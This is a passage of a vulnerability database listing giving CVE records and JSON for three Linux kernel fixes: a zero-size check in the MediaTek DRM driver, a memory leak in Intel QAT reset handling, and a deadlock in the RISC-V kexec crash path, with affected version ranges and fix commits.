	https://git.kernel.org/stable/c/9489951e3ae505534…
	https://git.kernel.org/stable/c/fb4aabdb1b48c25d9…
	https://git.kernel.org/stable/c/1e4350095e8ab2577…

Impacted products

Vendor

Product

Version

Linux

Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 79078880795478d551a05acc41f957700030d364 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < be34a1b351ea7faeb15dde8c44fe89de3980ae67 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < d17b75ee9c2e44d3a3682c4ea5ab713ea6073350 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 0e3b6f9123726858cac299e1654e3d20424cabe4 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 13562c2d48c9ee330de1077d00146742be368f05 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < af26ea99019caee1500bf7e60c861136c0bf8594 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 9489951e3ae505534c4013db4e76b1b5a3151ac7 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < fb4aabdb1b48c25d9e1ee28f89440fd2ce556405 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 1e4350095e8ab2577ee05f8c3b044e661b5af9a0 (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:22.970Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79078880795478d551a05acc41f957700030d364"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be34a1b351ea7faeb15dde8c44fe89de3980ae67"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d17b75ee9c2e44d3a3682c4ea5ab713ea6073350"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0e3b6f9123726858cac299e1654e3d20424cabe4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13562c2d48c9ee330de1077d00146742be368f05"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af26ea99019caee1500bf7e60c861136c0bf8594"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9489951e3ae505534c4013db4e76b1b5a3151ac7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb4aabdb1b48c25d9e1ee28f89440fd2ce556405"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1e4350095e8ab2577ee05f8c3b044e661b5af9a0"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38549",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:14:57.159226Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:57.567Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/mediatek/mtk_drm_gem.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "79078880795478d551a05acc41f957700030d364",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "be34a1b351ea7faeb15dde8c44fe89de3980ae67",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "d17b75ee9c2e44d3a3682c4ea5ab713ea6073350",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "0e3b6f9123726858cac299e1654e3d20424cabe4",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "13562c2d48c9ee330de1077d00146742be368f05",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "af26ea99019caee1500bf7e60c861136c0bf8594",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "9489951e3ae505534c4013db4e76b1b5a3151ac7",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "fb4aabdb1b48c25d9e1ee28f89440fd2ce556405",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            },
            {
              "lessThan": "1e4350095e8ab2577ee05f8c3b044e661b5af9a0",
              "status": "affected",
              "version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/mediatek/mtk_drm_gem.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Add 0 size check to mtk_drm_gem_obj\n\nAdd a check to mtk_drm_gem_init if we attempt to allocate a GEM object\nof 0 bytes. Currently, no such check exists and the kernel will panic if\na userspace application attempts to allocate a 0x0 GBM buffer.\n\nTested by attempting to allocate a 0x0 GBM buffer on an MT8188 and\nverifying that we now return EINVAL."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:46.917Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/79078880795478d551a05acc41f957700030d364"
        },
        {
          "url": "https://git.kernel.org/stable/c/be34a1b351ea7faeb15dde8c44fe89de3980ae67"
        },
        {
          "url": "https://git.kernel.org/stable/c/d17b75ee9c2e44d3a3682c4ea5ab713ea6073350"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e3b6f9123726858cac299e1654e3d20424cabe4"
        },
        {
          "url": "https://git.kernel.org/stable/c/13562c2d48c9ee330de1077d00146742be368f05"
        },
        {
          "url": "https://git.kernel.org/stable/c/af26ea99019caee1500bf7e60c861136c0bf8594"
        },
        {
          "url": "https://git.kernel.org/stable/c/9489951e3ae505534c4013db4e76b1b5a3151ac7"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb4aabdb1b48c25d9e1ee28f89440fd2ce556405"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e4350095e8ab2577ee05f8c3b044e661b5af9a0"
        }
      ],
      "title": "drm/mediatek: Add 0 size check to mtk_drm_gem_obj",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38549",
    "datePublished": "2024-06-19T13:35:22.042Z",
    "dateReserved": "2024-06-18T19:36:34.920Z",
    "dateUpdated": "2025-11-04T17:21:22.970Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39493 (GCVE-0-2024-39493)

Vulnerability from cvelistv5 – Published: 2024-07-10 07:18 – Updated: 2025-05-04 12:57

Title

crypto: qat - Fix ADF_DEV_RESET_SYNC memory leak

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: qat - Fix ADF_DEV_RESET_SYNC memory leak Using completion_done to determine whether the caller has gone away only works after a complete call. Furthermore it's still possible that the caller has not yet called wait_for_completion, resulting in another potential UAF. Fix this by making the caller use cancel_work_sync and then freeing the memory safely.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0ce5964b82f212f4d…
	https://git.kernel.org/stable/c/6396b33e98c096bff…
	https://git.kernel.org/stable/c/a718b6d2a329e069b…
	https://git.kernel.org/stable/c/3fb4601e0db10d4fe…
	https://git.kernel.org/stable/c/e7428e7e3fe94a508…
	https://git.kernel.org/stable/c/c2d443aa1ae3175c1…
	https://git.kernel.org/stable/c/d0fd124972724cce0…
	https://git.kernel.org/stable/c/d3b17c6d9dddc2db3…

Impacted products

Vendor

Product

Version

Linux

Affected: daba62d9eeddcc5b1081be7d348ca836c83c59d7 , < 0ce5964b82f212f4df6a9813f09a0b5de15bd9c8 (git)
Affected: 8e81cd58aee14a470891733181a47d123193ba81 , < 6396b33e98c096bff9c253ed49c008247963492a (git)
Affected: d03092550f526a79cf1ade7f0dfa74906f39eb71 , < a718b6d2a329e069b27d9049a71be5931e71d960 (git)
Affected: 4ae5a97781ce7d6ecc9c7055396535815b64ca4f , < 3fb4601e0db10d4fe25e46f3fa308d40d37366bd (git)
Affected: 226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7 , < e7428e7e3fe94a5089dc12ffe5bc31574d2315ad (git)
Affected: 8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc , < c2d443aa1ae3175c13a665f3a24b8acd759ce9c3 (git)
Affected: 7d42e097607c4d246d99225bf2b195b6167a210c , < d0fd124972724cce0d48b9865ce3e273ef69e246 (git)
Affected: 7d42e097607c4d246d99225bf2b195b6167a210c , < d3b17c6d9dddc2db3670bc9be628b122416a3d26 (git)
Affected: 0c2cf5142bfb634c0ef0a1a69cdf37950747d0be (git)
Affected: bb279ead42263e9fb09480f02a4247b2c287d828 (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39493",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-10T13:38:46.024569Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-10T13:39:00.365Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:16.000Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ce5964b82f212f4df6a9813f09a0b5de15bd9c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6396b33e98c096bff9c253ed49c008247963492a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a718b6d2a329e069b27d9049a71be5931e71d960"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3fb4601e0db10d4fe25e46f3fa308d40d37366bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e7428e7e3fe94a5089dc12ffe5bc31574d2315ad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2d443aa1ae3175c13a665f3a24b8acd759ce9c3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0fd124972724cce0d48b9865ce3e273ef69e246"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d3b17c6d9dddc2db3670bc9be628b122416a3d26"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/intel/qat/qat_common/adf_aer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0ce5964b82f212f4df6a9813f09a0b5de15bd9c8",
              "status": "affected",
              "version": "daba62d9eeddcc5b1081be7d348ca836c83c59d7",
              "versionType": "git"
            },
            {
              "lessThan": "6396b33e98c096bff9c253ed49c008247963492a",
              "status": "affected",
              "version": "8e81cd58aee14a470891733181a47d123193ba81",
              "versionType": "git"
            },
            {
              "lessThan": "a718b6d2a329e069b27d9049a71be5931e71d960",
              "status": "affected",
              "version": "d03092550f526a79cf1ade7f0dfa74906f39eb71",
              "versionType": "git"
            },
            {
              "lessThan": "3fb4601e0db10d4fe25e46f3fa308d40d37366bd",
              "status": "affected",
              "version": "4ae5a97781ce7d6ecc9c7055396535815b64ca4f",
              "versionType": "git"
            },
            {
              "lessThan": "e7428e7e3fe94a5089dc12ffe5bc31574d2315ad",
              "status": "affected",
              "version": "226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7",
              "versionType": "git"
            },
            {
              "lessThan": "c2d443aa1ae3175c13a665f3a24b8acd759ce9c3",
              "status": "affected",
              "version": "8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc",
              "versionType": "git"
            },
            {
              "lessThan": "d0fd124972724cce0d48b9865ce3e273ef69e246",
              "status": "affected",
              "version": "7d42e097607c4d246d99225bf2b195b6167a210c",
              "versionType": "git"
            },
            {
              "lessThan": "d3b17c6d9dddc2db3670bc9be628b122416a3d26",
              "status": "affected",
              "version": "7d42e097607c4d246d99225bf2b195b6167a210c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "0c2cf5142bfb634c0ef0a1a69cdf37950747d0be",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bb279ead42263e9fb09480f02a4247b2c287d828",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/intel/qat/qat_common/adf_aer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.19.312",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "5.4.274",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.10.215",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.15.154",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "6.1.84",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: qat - Fix ADF_DEV_RESET_SYNC memory leak\n\nUsing completion_done to determine whether the caller has gone\naway only works after a complete call.  Furthermore it\u0027s still\npossible that the caller has not yet called wait_for_completion,\nresulting in another potential UAF.\n\nFix this by making the caller use cancel_work_sync and then freeing\nthe memory safely."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:04.627Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0ce5964b82f212f4df6a9813f09a0b5de15bd9c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/6396b33e98c096bff9c253ed49c008247963492a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a718b6d2a329e069b27d9049a71be5931e71d960"
        },
        {
          "url": "https://git.kernel.org/stable/c/3fb4601e0db10d4fe25e46f3fa308d40d37366bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/e7428e7e3fe94a5089dc12ffe5bc31574d2315ad"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2d443aa1ae3175c13a665f3a24b8acd759ce9c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0fd124972724cce0d48b9865ce3e273ef69e246"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3b17c6d9dddc2db3670bc9be628b122416a3d26"
        }
      ],
      "title": "crypto: qat - Fix ADF_DEV_RESET_SYNC memory leak",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39493",
    "datePublished": "2024-07-10T07:18:39.443Z",
    "dateReserved": "2024-06-25T14:23:23.748Z",
    "dateUpdated": "2025-05-04T12:57:04.627Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42140 (GCVE-0-2024-42140)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

riscv: kexec: Avoid deadlock in kexec crash path

Summary

In the Linux kernel, the following vulnerability has been resolved: riscv: kexec: Avoid deadlock in kexec crash path If the kexec crash code is called in the interrupt context, the machine_kexec_mask_interrupts() function will trigger a deadlock while trying to acquire the irqdesc spinlock and then deactivate irqchip in irq_set_irqchip_state() function. Unlike arm64, riscv only requires irq_eoi handler to complete EOI and keeping irq_set_irqchip_state() will only leave this possible deadlock without any use. So we simply remove it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/bb80a7911218bbab2…
	https://git.kernel.org/stable/c/653deee48a4682ea1…
	https://git.kernel.org/stable/c/7692c9b6baacdee37…
	https://git.kernel.org/stable/c/484dd545271d02d15…
	https://git.kernel.org/stable/c/c562ba719df570c98…

Impacted products

Vendor

Product

Version

Linux

Affected: 12f237200c169a8667cf9dca7a40df8d7917b9fd , < bb80a7911218bbab2a69b5db7d2545643ab0073d (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 653deee48a4682ea17a05b96fb6842795ab5943c (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 7692c9b6baacdee378435f58f19baf0eb69e4155 (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 484dd545271d02d1571e1c6b62ea7df9dbe5e692 (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < c562ba719df570c986caf0941fea2449150bcbc4 (git)
Affected: 7594956fec8902dfc18150bf1dca0940cd4ad025 (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:08.287Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bb80a7911218bbab2a69b5db7d2545643ab0073d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/653deee48a4682ea17a05b96fb6842795ab5943c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7692c9b6baacdee378435f58f19baf0eb69e4155"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/484dd545271d02d1571e1c6b62ea7df9dbe5e692"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c562ba719df570c986caf0941fea2449150bcbc4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42140",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:56.730173Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:09.207Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/kernel/machine_kexec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "bb80a7911218bbab2a69b5db7d2545643ab0073d",
              "status": "affected",
              "version": "12f237200c169a8667cf9dca7a40df8d7917b9fd",
              "versionType": "git"
            },
            {
              "lessThan": "653deee48a4682ea17a05b96fb6842795ab5943c",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "7692c9b6baacdee378435f58f19baf0eb69e4155",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "484dd545271d02d1571e1c6b62ea7df9dbe5e692",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "c562ba719df570c986caf0941fea2449150bcbc4",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7594956fec8902dfc18150bf1dca0940cd4ad025",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/kernel/machine_kexec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
